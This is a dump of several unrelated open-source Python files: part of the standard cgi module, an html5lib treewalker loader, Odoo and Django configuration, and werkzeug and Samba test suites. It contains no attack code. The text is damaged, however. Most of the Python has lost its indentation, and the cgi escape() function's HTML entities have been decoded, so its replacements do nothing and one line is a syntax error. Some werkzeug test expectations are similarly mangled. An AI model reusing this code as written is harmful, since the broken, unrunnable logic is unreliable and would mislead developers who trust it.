self.innerboundary = pdict['boundary'].encode(self.encoding)
else:
self.innerboundary = b""
clen = -1
if 'content-length' in self.headers:
try:
clen = int(self.headers['content-length'])
except ValueError:
pass
if maxlen and clen > maxlen:
raise ValueError('Maximum content length exceeded')
self.length = clen
if self.limit is None and clen:
self.limit = clen
self.list = self.file = None
self.done = 0
if ctype == 'application/x-www-form-urlencoded':
self.read_urlencoded()
elif ctype[:10] == 'multipart/':
self.read_multi(environ, keep_blank_values, strict_parsing)
else:
self.read_single()
def __repr__(self):
"""Return a printable representation."""
return "FieldStorage(%r, %r, %r)" % (
self.name, self.filename, self.value)
def __iter__(self):
return iter(self.keys())
def __getattr__(self, name):
if name != 'value':
raise AttributeError(name)
if self.file:
self.file.seek(0)
value = self.file.read()
self.file.seek(0)
elif self.list is not None:
value = self.list
else:
value = None
return value
def __getitem__(self, key):
"""Dictionary style indexing."""
if self.list is None:
raise TypeError("not indexable")
found = []
for item in self.list:
if item.name == key: found.append(item)
if not found:
raise KeyError(key)
if len(found) == 1:
return found[0]
else:
return found
def getvalue(self, key, default=None):
"""Dictionary style get() method, including 'value' lookup."""
if key in self:
value = self[key]
if isinstance(value, list):
return [x.value for x in value]
else:
return value.value
else:
return default
def getfirst(self, key, default=None):
""" Return the first value received."""
if key in self:
value = self[key]
if isinstance(value, list):
return value[0].value
else:
return value.value
else:
return default
def getlist(self, key):
""" Return list of received values."""
if key in self:
value = self[key]
if isinstance(value, list):
return [x.value for x in value]
else:
return [value.value]
else:
return []
def keys(self):
"""Dictionary style keys() method."""
if self.list is None:
raise TypeError("not indexable")
return list(set(item.name for item in self.list))
def __contains__(self, key):
"""Dictionary style __contains__ method."""
if self.list is None:
raise TypeError("not indexable")
return any(item.name == key for item in self.list)
def __len__(self):
"""Dictionary style len(x) support."""
return len(self.keys())
    def __bool__(self):
        # Python 3 looks up __bool__; the old __nonzero__ name is never called.
        return bool(self.list)
def read_urlencoded(self):
"""Internal: read data in query string format."""
qs = self.fp.read(self.length)
if not isinstance(qs, bytes):
raise ValueError("%s should return bytes, got %s" \
% (self.fp, type(qs).__name__))
qs = qs.decode(self.encoding, self.errors)
if self.qs_on_post:
qs += '&' + self.qs_on_post
self.list = []
query = urllib.parse.parse_qsl(
qs, self.keep_blank_values, self.strict_parsing,
encoding=self.encoding, errors=self.errors)
for key, value in query:
self.list.append(MiniFieldStorage(key, value))
self.skip_lines()
FieldStorageClass = None
def read_multi(self, environ, keep_blank_values, strict_parsing):
"""Internal: read a part that is itself multipart."""
ib = self.innerboundary
if not valid_boundary(ib):
raise ValueError('Invalid boundary in multipart form: %r' % (ib,))
self.list = []
if self.qs_on_post:
query = urllib.parse.parse_qsl(
self.qs_on_post, self.keep_blank_values, self.strict_parsing,
encoding=self.encoding, errors=self.errors)
for key, value in query:
self.list.append(MiniFieldStorage(key, value))
klass = self.FieldStorageClass or self.__class__
first_line = self.fp.readline() # bytes
if not isinstance(first_line, bytes):
raise ValueError("%s should return bytes, got %s" \
% (self.fp, type(first_line).__name__))
self.bytes_read += len(first_line)
        # first line holds boundary; ignore it, or check that
        # b"--" + ib == first_line.strip() ?
while True:
parser = FeedParser()
hdr_text = b""
while True:
data = self.fp.readline()
hdr_text += data
if not data.strip():
break
if not hdr_text:
break
            self.bytes_read += len(hdr_text)
            # parser takes strings, not bytes
            parser.feed(hdr_text.decode(self.encoding, self.errors))
headers = parser.close()
            # Pass the remaining byte budget on to the nested part; keep None
            # (no limit) as None instead of raising a TypeError on subtraction.
            limit = None if self.limit is None else self.limit - self.bytes_read
            part = klass(self.fp, headers, ib, environ, keep_blank_values,
                         strict_parsing, limit,
                         self.encoding, self.errors)
self.bytes_read += part.bytes_read
self.list.append(part)
if self.bytes_read >= self.length:
break
self.skip_lines()
def read_single(self):
"""Internal: read an atomic part."""
if self.length >= 0:
self.read_binary()
self.skip_lines()
else:
self.read_lines()
self.file.seek(0)
bufsize = 8*1024 # I/O buffering size for copy to file
def read_binary(self):
"""Internal: read binary data."""
self.file = self.make_file()
todo = self.length
if todo >= 0:
while todo > 0:
data = self.fp.read(min(todo, self.bufsize)) # bytes
if not isinstance(data, bytes):
raise ValueError("%s should return bytes, got %s"
% (self.fp, type(data).__name__))
self.bytes_read += len(data)
if not data:
self.done = -1
break
self.file.write(data)
todo = todo - len(data)
def read_lines(self):
"""Internal: read lines until EOF or outerboundary."""
if self._binary_file:
self.file = self.__file = BytesIO() # store data as bytes for files
else:
self.file = self.__file = StringIO() # as strings for other fields
if self.outerboundary:
self.read_lines_to_outerboundary()
else:
self.read_lines_to_eof()
def __write(self, line):
"""line is always bytes, not string"""
if self.__file is not None:
if self.__file.tell() + len(line) > 1000:
self.file = self.make_file()
data = self.__file.getvalue()
self.file.write(data)
self.__file = None
if self._binary_file:
# keep bytes
self.file.write(line)
else:
# decode to string
self.file.write(line.decode(self.encoding, self.errors))
def read_lines_to_eof(self):
"""Internal: read lines until EOF."""
while 1:
line = self.fp.readline(1<<16) # bytes
self.bytes_read += len(line)
if not line:
self.done = -1
break
self.__write(line)
def read_lines_to_outerboundary(self):
"""Internal: read lines until outerboundary.
Data is read as bytes: boundaries and line ends must be converted
to bytes for comparisons.
"""
next_boundary = b"--" + self.outerboundary
last_boundary = next_boundary + b"--"
delim = b""
last_line_lfend = True
_read = 0
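        # The line delimiter is written one iteration late (odelim below),
        # so the CRLF that immediately precedes the boundary is treated as
        # part of the boundary and never ends up in the part's payload.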
while 1:
            # Stop once the declared limit is consumed; a limit of None (no
            # Content-Length) means "read until the boundary or EOF".
            if self.limit is not None and 0 <= self.limit <= _read:
                break
line = self.fp.readline(1<<16) # bytes
self.bytes_read += len(line)
_read += len(line)
if not line:
self.done = -1
break
if line.startswith(b"--") and last_line_lfend:
strippedline = line.rstrip()
if strippedline == next_boundary:
break
if strippedline == last_boundary:
self.done = 1
break
odelim = delim
if line.endswith(b"\r\n"):
delim = b"\r\n"
line = line[:-2]
last_line_lfend = True
elif line.endswith(b"\n"):
delim = b"\n"
line = line[:-1]
last_line_lfend = True
else:
delim = b""
last_line_lfend = False
self.__write(odelim + line)
def skip_lines(self):
"""Internal: skip lines until outer boundary if defined."""
if not self.outerboundary or self.done:
return
next_boundary = b"--" + self.outerboundary
last_boundary = next_boundary + b"--"
last_line_lfend = True
while True:
line = self.fp.readline(1<<16)
self.bytes_read += len(line)
if not line:
self.done = -1
break
if line.endswith(b"--") and last_line_lfend:
strippedline = line.strip()
if strippedline == next_boundary:
break
if strippedline == last_boundary:
self.done = 1
break
last_line_lfend = line.endswith(b'\n')
def make_file(self):
"""Overridable: return a readable & writable file.
The file will be used as follows:
- data is written to it
- seek(0)
- data is read from it
The file is opened in binary mode for files, in text mode
for other fields
This version opens a temporary file for reading and writing,
and immediately deletes (unlinks) it. The trick (on Unix!) is
that the file can still be used, but it can't be opened by
another process, and it will automatically be deleted when it
is closed or when the current process terminates.
If you want a more permanent file, you derive a class which
overrides this method. If you want a visible temporary file
that is nevertheless automatically deleted when the script
terminates, try defining a __del__ method in a derived class
which unlinks the temporary files you have created.
"""
if self._binary_file:
return tempfile.TemporaryFile("wb+")
else:
return tempfile.TemporaryFile("w+",
                encoding=self.encoding, newline='\n')
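
# Hedged sketch of the overriding pattern described in make_file()'s
# docstring: a FieldStorage subclass that keeps uploads on disk instead of
# an unlinked temporary file. The class name is illustrative, not part of
# this module's API.
class PersistentFieldStorage(FieldStorage):
    def make_file(self):
        # delete=False keeps the file around after close(), unlike the
        # anonymous TemporaryFile used by the default implementation.
        if self._binary_file:
            return tempfile.NamedTemporaryFile("wb+", delete=False)
        return tempfile.NamedTemporaryFile(
            "w+", encoding=self.encoding, newline='\n', delete=False)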
# Test/debug code
# ===============
def test(environ=os.environ):
"""Robust test CGI script, usable as main program.
Write minimal HTTP headers and dump all information provided to
the script in HTML form.
"""
print("Content-type: text/html")
print()
sys.stderr = sys.stdout
try:
form = FieldStorage() # Replace with other classes to test those
print_directory()
print_arguments()
print_form(form)
print_environ(environ)
print_environ_usage()
def f():
exec("testing print_exception() -- <I>italics?</I>")
def g(f=f):
f()
print("<H3>What follows is a test, not an actual exception:</H3>")
g()
except:
print_exception()
print("<H1>Second try with a small maxlen...</H1>")
global maxlen
maxlen = 50
try:
form = FieldStorage() # Replace with other classes to test those
print_directory()
print_arguments()
print_form(form)
print_environ(environ)
except:
print_exception()
def print_exception(type=None, value=None, tb=None, limit=None):
if type is None:
type, value, tb = sys.exc_info()
import traceback
print()
print("<H3>Traceback (most recent call last):</H3>")
list = traceback.format_tb(tb, limit) + \
traceback.format_exception_only(type, value)
print("<PRE>%s<B>%s</B></PRE>" % (
html.escape("".join(list[:-1])),
html.escape(list[-1]),
))
del tb
def print_environ(environ=os.environ):
"""Dump the shell environment as HTML."""
keys = sorted(environ.keys())
print()
print("<H3>Shell Environment:</H3>")
print("<DL>")
for key in keys:
print("<DT>", html.escape(key), "<DD>", html.escape(environ[key]))
print("</DL>")
print()
def print_form(form):
"""Dump the contents of a form as HTML."""
keys = sorted(form.keys())
print()
print("<H3>Form Contents:</H3>")
if not keys:
print("<P>No form fields.")
print("<DL>")
for key in keys:
print("<DT>" + html.escape(key) + ":", end=' ')
value = form[key]
print("<i>" + html.escape(repr(type(value))) + "</i>")
print("<DD>" + html.escape(repr(value)))
print("</DL>")
print()
def print_directory():
"""Dump the current directory as HTML."""
print()
print("<H3>Current Working Directory:</H3>")
try:
pwd = os.getcwd()
except os.error as msg:
print("os.error:", html.escape(str(msg)))
else:
print(html.escape(pwd))
print()
def print_arguments():
print()
print("<H3>Command Line Arguments:</H3>")
print()
print(sys.argv)
print()
def print_environ_usage():
"""Dump a list of environment variables used by CGI as HTML."""
print("""
<H3>These environment variables could have been set:</H3>
<UL>
<LI>AUTH_TYPE
<LI>CONTENT_LENGTH
<LI>CONTENT_TYPE
<LI>DATE_GMT
<LI>DATE_LOCAL
<LI>DOCUMENT_NAME
<LI>DOCUMENT_ROOT
<LI>DOCUMENT_URI
<LI>GATEWAY_INTERFACE
<LI>LAST_MODIFIED
<LI>PATH
<LI>PATH_INFO
<LI>PATH_TRANSLATED
<LI>QUERY_STRING
<LI>REMOTE_ADDR
<LI>REMOTE_HOST
<LI>REMOTE_IDENT
<LI>REMOTE_USER
<LI>REQUEST_METHOD
<LI>SCRIPT_NAME
<LI>SERVER_NAME
<LI>SERVER_PORT
<LI>SERVER_PROTOCOL
<LI>SERVER_ROOT
<LI>SERVER_SOFTWARE
</UL>
In addition, HTTP headers sent by the server may be passed in the
environment as well. Here are some common variable names:
<UL>
<LI>HTTP_ACCEPT
<LI>HTTP_CONNECTION
<LI>HTTP_HOST
<LI>HTTP_PRAGMA
<LI>HTTP_REFERER
<LI>HTTP_USER_AGENT
</UL>
""")
# Utilities
# =========
def escape(s, quote=None):
"""Deprecated API."""
warn("cgi.escape is deprecated, use html.escape instead",
PendingDeprecationWarning, stacklevel=2)
s = s.replace("&", "&") # Must be done first!
s = s.replace("<", "<")
s = s.replace(">", ">")
if quote:
s = s.replace('"', """)
return s
def valid_boundary(s, _vb_pattern=None):
import re
if isinstance(s, bytes):
_vb_pattern = b"^[ -~]{0,200}[!-~]$"
else:
_vb_pattern = "^[ -~]{0,200}[!-~]$"
return re.match(_vb_pattern, s)
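# Illustrative behaviour (hedged): the pattern accepts up to 200 printable
# ASCII characters ending in a non-space character, e.g.
#
#   valid_boundary(b"simple boundary")   # -> match object (accepted)
#   valid_boundary(b"trailing space ")   # -> None (rejected)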
# Invoke mainline
# ===============
# Call test() when this file is run as a script (not imported as a module)
if __name__ == '__main__':
test()
| apache-2.0 |
clstl/servo | tests/wpt/css-tests/tools/html5lib/html5lib/treewalkers/__init__.py | 1229 | 2323 | """A collection of modules for iterating through different kinds of
tree, generating tokens identical to those produced by the tokenizer
module.
To create a tree walker for a new type of tree, you need to
implement a tree walker object (called TreeWalker by convention) that
implements a 'serialize' method taking a tree as sole argument and
returning an iterator generating tokens.
"""
from __future__ import absolute_import, division, unicode_literals
import sys
from ..utils import default_etree
treeWalkerCache = {}
def getTreeWalker(treeType, implementation=None, **kwargs):
"""Get a TreeWalker class for various types of tree with built-in support
treeType - the name of the tree type required (case-insensitive). Supported
values are:
"dom" - The xml.dom.minidom DOM implementation
"pulldom" - The xml.dom.pulldom event stream
"etree" - A generic walker for tree implementations exposing an
elementtree-like interface (known to work with
ElementTree, cElementTree and lxml.etree).
"lxml" - Optimized walker for lxml.etree
"genshi" - a Genshi stream
implementation - (Currently applies to the "etree" tree type only). A module
implementing the tree type e.g. xml.etree.ElementTree or
cElementTree."""
treeType = treeType.lower()
if treeType not in treeWalkerCache:
if treeType in ("dom", "pulldom"):
name = "%s.%s" % (__name__, treeType)
__import__(name)
mod = sys.modules[name]
treeWalkerCache[treeType] = mod.TreeWalker
elif treeType == "genshi":
from . import genshistream
treeWalkerCache[treeType] = genshistream.TreeWalker
elif treeType == "lxml":
from . import lxmletree
treeWalkerCache[treeType] = lxmletree.TreeWalker
elif treeType == "etree":
from . import etree
if implementation is None:
implementation = default_etree
# XXX: NEVER cache here, caching is done in the etree submodule
return etree.getETreeModule(implementation, **kwargs).TreeWalker
return treeWalkerCache.get(treeType)
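
# Hedged usage sketch: getTreeWalker returns a TreeWalker *class*, which is
# instantiated with a parsed tree and iterated to obtain token dicts. The
# sample markup is illustrative and assumes html5lib itself is importable.
if __name__ == "__main__":
    import html5lib

    document = html5lib.parse("<p>Hello <b>world</b></p>", treebuilder="dom")
    TreeWalker = getTreeWalker("dom")
    for token in TreeWalker(document):
        print(token["type"])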
| mpl-2.0 |
hurrinico/l10n-italy | l10n_it_ricevute_bancarie/__openerp__.py | 1 | 2257 | # -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2012 Andrea Cometa.
# Email: [email protected]
# Web site: http://www.andreacometa.it
# Copyright (C) 2012 Agile Business Group sagl (<http://www.agilebg.com>)
# Copyright (C) 2012 Domsense srl (<http://www.domsense.com>)
# Copyright (C) 2012 Associazione OpenERP Italia
# (<http://www.openerp-italia.org>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published
# by the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': "Ricevute Bancarie",
'version': "8.0.1.3.0",
'author': "Odoo Community Association (OCA)",
'category': "Accounting & Finance",
'website': "http://www.odoo-italia.org",
'license': "AGPL-3",
'depends': [
'account_voucher',
'l10n_it_fiscalcode',
'account_due_list',
'base_iban',
'l10n_it_abicab'],
'data': [
"views/partner_view.xml",
"views/configuration_view.xml",
"riba_sequence.xml",
"views/wizard_accreditation.xml",
"views/wizard_unsolved.xml",
"views/riba_view.xml",
"views/account_view.xml",
"views/wizard_riba_issue.xml",
"views/wizard_riba_file_export.xml",
"views/account_config_view.xml",
"riba_workflow.xml",
"security/ir.model.access.csv",
],
'images': [],
'demo': ["demo/riba_demo.xml"],
'test': [
'test/riba_invoice.yml',
'test/issue_riba.yml',
'test/unsolved_riba.yml',
],
'installable': True,
}
| agpl-3.0 |
MalloyPower/parsing-python | front-end/testsuite-python-lib/Python-3.0/Lib/test/test_errno.py | 5 | 1160 | #! /usr/bin/env python
"""Test the errno module
Roger E. Masse
"""
import errno
from test import support
import unittest
std_c_errors = frozenset(['EDOM', 'ERANGE'])
class ErrnoAttributeTests(unittest.TestCase):
def test_for_improper_attributes(self):
# No unexpected attributes should be on the module.
for error_code in std_c_errors:
self.assert_(hasattr(errno, error_code),
"errno is missing %s" % error_code)
def test_using_errorcode(self):
# Every key value in errno.errorcode should be on the module.
for value in errno.errorcode.values():
self.assert_(hasattr(errno, value), 'no %s attr in errno' % value)
class ErrorcodeTests(unittest.TestCase):
def test_attributes_in_errorcode(self):
for attribute in errno.__dict__.keys():
if attribute.isupper():
self.assert_(getattr(errno, attribute) in errno.errorcode,
'no %s attr in errno.errorcode' % attribute)
def test_main():
support.run_unittest(ErrnoAttributeTests, ErrorcodeTests)
if __name__ == '__main__':
test_main()
| mit |
nbcesar/sabergrade | lib/python2.7/site-packages/werkzeug/testsuite/debug.py | 101 | 7859 | # -*- coding: utf-8 -*-
"""
werkzeug.testsuite.debug
~~~~~~~~~~~~~~~~~~~~~~~~
Tests some debug utilities.
:copyright: (c) 2013 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import unittest
import sys
import re
from werkzeug.testsuite import WerkzeugTestCase
from werkzeug.debug.repr import debug_repr, DebugReprGenerator, \
dump, helper
from werkzeug.debug.console import HTMLStringO
from werkzeug._compat import PY2
class DebugReprTestCase(WerkzeugTestCase):
def test_basic_repr(self):
self.assert_equal(debug_repr([]), u'[]')
self.assert_equal(debug_repr([1, 2]),
u'[<span class="number">1</span>, <span class="number">2</span>]')
self.assert_equal(debug_repr([1, 'test']),
u'[<span class="number">1</span>, <span class="string">\'test\'</span>]')
self.assert_equal(debug_repr([None]),
u'[<span class="object">None</span>]')
def test_sequence_repr(self):
self.assert_equal(debug_repr(list(range(20))), (
u'[<span class="number">0</span>, <span class="number">1</span>, '
u'<span class="number">2</span>, <span class="number">3</span>, '
u'<span class="number">4</span>, <span class="number">5</span>, '
u'<span class="number">6</span>, <span class="number">7</span>, '
u'<span class="extended"><span class="number">8</span>, '
u'<span class="number">9</span>, <span class="number">10</span>, '
u'<span class="number">11</span>, <span class="number">12</span>, '
u'<span class="number">13</span>, <span class="number">14</span>, '
u'<span class="number">15</span>, <span class="number">16</span>, '
u'<span class="number">17</span>, <span class="number">18</span>, '
u'<span class="number">19</span></span>]'
))
def test_mapping_repr(self):
self.assert_equal(debug_repr({}), u'{}')
self.assert_equal(debug_repr({'foo': 42}),
u'{<span class="pair"><span class="key"><span class="string">\'foo\''
u'</span></span>: <span class="value"><span class="number">42'
u'</span></span></span>}')
self.assert_equal(debug_repr(dict(zip(range(10), [None] * 10))),
u'{<span class="pair"><span class="key"><span class="number">0</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="pair"><span class="key"><span class="number">1</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="pair"><span class="key"><span class="number">2</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="pair"><span class="key"><span class="number">3</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="extended"><span class="pair"><span class="key"><span class="number">4</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="pair"><span class="key"><span class="number">5</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="pair"><span class="key"><span class="number">6</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="pair"><span class="key"><span class="number">7</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="pair"><span class="key"><span class="number">8</span></span>: <span class="value"><span class="object">None</span></span></span>, <span class="pair"><span class="key"><span class="number">9</span></span>: <span class="value"><span class="object">None</span></span></span></span>}')
self.assert_equal(
debug_repr((1, 'zwei', u'drei')),
u'(<span class="number">1</span>, <span class="string">\''
u'zwei\'</span>, <span class="string">%s\'drei\'</span>)' % ('u' if PY2 else ''))
def test_custom_repr(self):
class Foo(object):
def __repr__(self):
return '<Foo 42>'
self.assert_equal(debug_repr(Foo()),
'<span class="object"><Foo 42></span>')
def test_list_subclass_repr(self):
class MyList(list):
pass
self.assert_equal(
debug_repr(MyList([1, 2])),
u'<span class="module">werkzeug.testsuite.debug.</span>MyList(['
u'<span class="number">1</span>, <span class="number">2</span>])')
def test_regex_repr(self):
self.assert_equal(debug_repr(re.compile(r'foo\d')),
u're.compile(<span class="string regex">r\'foo\\d\'</span>)')
        # XXX: no raw string here because of a syntax bug in py3.3
self.assert_equal(debug_repr(re.compile(u'foo\\d')),
u're.compile(<span class="string regex">%sr\'foo\\d\'</span>)' %
('u' if PY2 else ''))
def test_set_repr(self):
self.assert_equal(debug_repr(frozenset('x')),
u'frozenset([<span class="string">\'x\'</span>])')
self.assert_equal(debug_repr(set('x')),
u'set([<span class="string">\'x\'</span>])')
def test_recursive_repr(self):
a = [1]
a.append(a)
self.assert_equal(debug_repr(a),
u'[<span class="number">1</span>, [...]]')
def test_broken_repr(self):
class Foo(object):
def __repr__(self):
raise Exception('broken!')
self.assert_equal(
debug_repr(Foo()),
u'<span class="brokenrepr"><broken repr (Exception: '
u'broken!)></span>')
class Foo(object):
x = 42
y = 23
def __init__(self):
self.z = 15
class DebugHelpersTestCase(WerkzeugTestCase):
def test_object_dumping(self):
drg = DebugReprGenerator()
out = drg.dump_object(Foo())
assert re.search('Details for werkzeug.testsuite.debug.Foo object at', out)
assert re.search('<th>x.*<span class="number">42</span>(?s)', out)
assert re.search('<th>y.*<span class="number">23</span>(?s)', out)
assert re.search('<th>z.*<span class="number">15</span>(?s)', out)
out = drg.dump_object({'x': 42, 'y': 23})
assert re.search('Contents of', out)
assert re.search('<th>x.*<span class="number">42</span>(?s)', out)
assert re.search('<th>y.*<span class="number">23</span>(?s)', out)
out = drg.dump_object({'x': 42, 'y': 23, 23: 11})
assert not re.search('Contents of', out)
out = drg.dump_locals({'x': 42, 'y': 23})
assert re.search('Local variables in frame', out)
assert re.search('<th>x.*<span class="number">42</span>(?s)', out)
assert re.search('<th>y.*<span class="number">23</span>(?s)', out)
def test_debug_dump(self):
old = sys.stdout
sys.stdout = HTMLStringO()
try:
dump([1, 2, 3])
x = sys.stdout.reset()
dump()
y = sys.stdout.reset()
finally:
sys.stdout = old
self.assert_in('Details for list object at', x)
self.assert_in('<span class="number">1</span>', x)
self.assert_in('Local variables in frame', y)
self.assert_in('<th>x', y)
self.assert_in('<th>old', y)
def test_debug_help(self):
old = sys.stdout
sys.stdout = HTMLStringO()
try:
helper([1, 2, 3])
x = sys.stdout.reset()
finally:
sys.stdout = old
self.assert_in('Help on list object', x)
self.assert_in('__delitem__', x)
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(DebugReprTestCase))
suite.addTest(unittest.makeSuite(DebugHelpersTestCase))
return suite
| apache-2.0 |
DarkArtek/FFXIVITAFC | news2/migrations/0001_initial.py | 1 | 1204 | # -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2017-07-28 08:26
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='PostNews',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, verbose_name='Titolo Articolo')),
('text', models.TextField(verbose_name='Contenuto')),
('created_date', models.DateTimeField(default=django.utils.timezone.now, verbose_name='Data di Creazione')),
('published_date', models.DateTimeField(blank=True, null=True, verbose_name='Data di Pubblicazione')),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL, verbose_name='Autore')),
],
),
]
| unlicense |
shingonoide/odoo | addons/hr_contract/__openerp__.py | 260 | 1834 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Employee Contracts',
'version': '1.0',
'category': 'Human Resources',
'description': """
Add all information on the employee form to manage contracts.
=============================================================
* Contract
* Place of Birth,
* Medical Examination Date
* Company Vehicle
You can assign several contracts per employee.
""",
'author': 'OpenERP SA',
'website': 'https://www.odoo.com/page/employees',
'depends': ['base_action_rule', 'hr'],
'data': [
'security/ir.model.access.csv',
'hr_contract_view.xml',
'hr_contract_data.xml',
'base_action_rule_view.xml',
],
'demo': [],
'test': ['test/test_hr_contract.yml'],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
sYnfo/samba-1 | python/samba/tests/upgradeprovisionneeddc.py | 32 | 7461 | # Unix SMB/CIFS implementation.
# Copyright (C) Jelmer Vernooij <[email protected]> 2007-2008
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""Tests for samba.upgradeprovision that need a DC."""
import os
import re
import shutil
from samba import param
from samba.credentials import Credentials
from samba.auth import system_session
from samba.provision import getpolicypath, find_provision_key_parameters
from samba.upgradehelpers import (get_paths, get_ldbs,
identic_rename,
updateOEMInfo, getOEMInfo, update_gpo,
delta_update_basesamdb,
update_dns_account_password,
search_constructed_attrs_stored,
increment_calculated_keyversion_number)
from samba.tests import env_loadparm, TestCaseInTempDir
from samba.tests.provision import create_dummy_secretsdb
import ldb
def dummymessage(a=None, b=None):
pass
smb_conf_path = "%s/%s/%s" % (os.environ["SELFTEST_PREFIX"], "ad_dc_ntvfs", "etc/smb.conf")
class UpgradeProvisionBasicLdbHelpersTestCase(TestCaseInTempDir):
"""Some simple tests for individual functions in the provisioning code.
"""
def test_get_ldbs(self):
paths = get_paths(param, None, smb_conf_path)
creds = Credentials()
lp = env_loadparm()
creds.guess(lp)
get_ldbs(paths, creds, system_session(), lp)
def test_find_key_param(self):
paths = get_paths(param, None, smb_conf_path)
creds = Credentials()
lp = env_loadparm()
creds.guess(lp)
rootdn = "dc=samba,dc=example,dc=com"
ldbs = get_ldbs(paths, creds, system_session(), lp)
names = find_provision_key_parameters(ldbs.sam, ldbs.secrets, ldbs.idmap,
paths, smb_conf_path, lp)
self.assertEquals(names.realm, "SAMBA.EXAMPLE.COM")
self.assertEquals(str(names.rootdn).lower(), rootdn.lower())
self.assertNotEquals(names.policyid_dc, None)
self.assertNotEquals(names.ntdsguid, "")
class UpgradeProvisionWithLdbTestCase(TestCaseInTempDir):
def _getEmptyDbName(self):
return os.path.join(self.tempdir, "sam.ldb")
def setUp(self):
super(UpgradeProvisionWithLdbTestCase, self).setUp()
paths = get_paths(param, None, smb_conf_path)
self.creds = Credentials()
self.lp = env_loadparm()
self.creds.guess(self.lp)
self.paths = paths
self.ldbs = get_ldbs(paths, self.creds, system_session(), self.lp)
self.names = find_provision_key_parameters(self.ldbs.sam,
self.ldbs.secrets, self.ldbs.idmap, paths, smb_conf_path,
self.lp)
self.referencedb = create_dummy_secretsdb(
os.path.join(self.tempdir, "ref.ldb"))
def test_search_constructed_attrs_stored(self):
hashAtt = search_constructed_attrs_stored(self.ldbs.sam,
self.names.rootdn,
["msds-KeyVersionNumber"])
        self.assertNotIn("msds-KeyVersionNumber", hashAtt)
def test_increment_calculated_keyversion_number(self):
dn = "CN=Administrator,CN=Users,%s" % self.names.rootdn
        # We construct a simple hash for the user administrator
hash = {}
# And we want the version to be 140
hash[dn.lower()] = 140
increment_calculated_keyversion_number(self.ldbs.sam,
self.names.rootdn,
hash)
self.assertEqual(self.ldbs.sam.get_attribute_replmetadata_version(dn,
"unicodePwd"),
140)
# This function should not decrement the version
hash[dn.lower()] = 130
increment_calculated_keyversion_number(self.ldbs.sam,
self.names.rootdn,
hash)
self.assertEqual(self.ldbs.sam.get_attribute_replmetadata_version(dn,
"unicodePwd"),
140)
def test_identic_rename(self):
rootdn = "DC=samba,DC=example,DC=com"
guestDN = ldb.Dn(self.ldbs.sam, "CN=Guest,CN=Users,%s" % rootdn)
identic_rename(self.ldbs.sam, guestDN)
res = self.ldbs.sam.search(expression="(name=Guest)", base=rootdn,
scope=ldb.SCOPE_SUBTREE, attrs=["dn"])
self.assertEquals(len(res), 1)
self.assertEquals(str(res[0]["dn"]), "CN=Guest,CN=Users,%s" % rootdn)
def test_delta_update_basesamdb(self):
dummysampath = self._getEmptyDbName()
delta_update_basesamdb(self.paths.samdb, dummysampath,
self.creds, system_session(), self.lp,
dummymessage)
def test_update_gpo_simple(self):
dir = getpolicypath(self.paths.sysvol, self.names.dnsdomain,
self.names.policyid)
shutil.rmtree(dir)
self.assertFalse(os.path.isdir(dir))
update_gpo(self.paths, self.ldbs.sam, self.names, self.lp, dummymessage)
self.assertTrue(os.path.isdir(dir))
def test_update_gpo_acl(self):
path = os.path.join(self.tempdir, "testupdategpo")
save = self.paths.sysvol
self.paths.sysvol = path
os.mkdir(path)
os.mkdir(os.path.join(path, self.names.dnsdomain))
os.mkdir(os.path.join(os.path.join(path, self.names.dnsdomain),
"Policies"))
update_gpo(self.paths, self.ldbs.sam, self.names, self.lp, dummymessage)
shutil.rmtree(path)
self.paths.sysvol = save
def test_getOEMInfo(self):
realm = self.lp.get("realm")
basedn = "DC=%s" % realm.replace(".", ", DC=")
oem = getOEMInfo(self.ldbs.sam, basedn)
self.assertNotEquals(oem, "")
def test_update_dns_account(self):
update_dns_account_password(self.ldbs.sam, self.ldbs.secrets,
self.names)
def test_updateOEMInfo(self):
realm = self.lp.get("realm")
